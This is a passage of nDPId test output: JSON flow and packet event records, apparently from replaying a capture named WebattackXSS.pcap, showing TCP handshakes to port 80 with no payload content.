+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347659123,"flow_last_seen":1499347659123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347659123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1499347659123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x6pAAD4G\/iWsEAABwKgKMuikAFB+qkyDAAAAAKACchAefQAAAgQFtAQCCAoBO4spAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":2,"flow_last_seen":1499347659123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6KSKjQS\/fqpMhKAScSAvjAAAAgQFtAQCCAoD5VyeATuLKQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":3,"flow_last_seen":1499347659124,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347659124,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x6tAAD4G\/iysEAABwKgKMuikAFB+qkyEio0EwIAQAOXOkwAAAQEICgE7iykD5Vye"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347660441,"flow_last_seen":1499347660441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347660441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1499347660441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJ9AAD4GfTGsEAABwKgKMuiyAFDQzcTuAAAAAKACchBSmAAAAgQFtAQCCAoBO4xxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":2,"flow_last_seen":1499347660441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6LJiYdyB0M3E76AScSCyxwAAAgQFtAQCCAoD5V3nATuMcQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":3,"flow_last_seen":1499347660448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347660448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SKBAAD4GfTisEAABwKgKMuiyAFDQzcTvYmHcgoAQAOVRzQAAAQEICgE7jHMD5V3n"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347661705,"flow_last_seen":1499347661705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347661705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1499347661705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iZ5AAD4GPDKsEAABwKgKMujAAFBNGwQwAAAAAKACchCVvgAAAgQFtAQCCAoBO42uAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":2,"flow_last_seen":1499347661705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6MCaW9JGTRsEMaAScSDG8gAAAgQFtAQCCAoD5V8jATuNrgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":3,"flow_last_seen":1499347661709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347661709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iZ9AAD4GPDmsEAABwKgKMujAAFBNGwQxmlvSR4AQAOVl+QAAAQEICgE7ja8D5V8j"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347664226,"flow_last_seen":1499347664226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347664226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1499347664226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ye5AAD4GY+KsEAABwKgKMujaAFDKDfHLAAAAAKACchAonwAAAgQFtAQCCAoBO5AlAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":2,"flow_last_seen":1499347664227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664227,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6NqT+P5Dyg3xzKAScSAxwgAAAgQFtAQCCAoD5WGaATuQJQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":3,"flow_last_seen":1499347664227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347664227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ye9AAD4GY+msEAABwKgKMujaAFDKDfHMk\/j+RIAQAOXQyQAAAQEICgE7kCUD5WGa"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347665473,"flow_last_seen":1499347665473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347665473,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1499347665473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f9VAAD4GRfusEAABwKgKMujoAFDrVO6JAAAAAKACchAJVQAAAgQFtAQCCAoBO5FcAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":2,"flow_last_seen":1499347665473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6OhBKwT561TuiqAScSBdWQAAAgQFtAQCCAoD5WLRATuRXAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":3,"flow_last_seen":1499347665474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347665474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f9ZAAD4GRgKsEAABwKgKMujoAFDrVO6KQSsE+oAQAOX8XwAAAQEICgE7kV0D5WLR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347668069,"flow_last_seen":1499347668069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1499347668069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TE1AAD4GeYOsEAABwKgKMukCAFANB9+oAAAAAKACchDz4AAAAgQFtAQCCAoBO5PlAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":2,"flow_last_seen":1499347668069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6QI2lo7HDQffqaAScSDGIgAAAgQFtAQCCAoD5WVaATuT5QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":3,"flow_last_seen":1499347668070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347668070,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TE5AAD4GeYqsEAABwKgKMukCAFANB9+pNpaOyIAQAOVlKQAAAQEICgE7k+YD5WVa"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 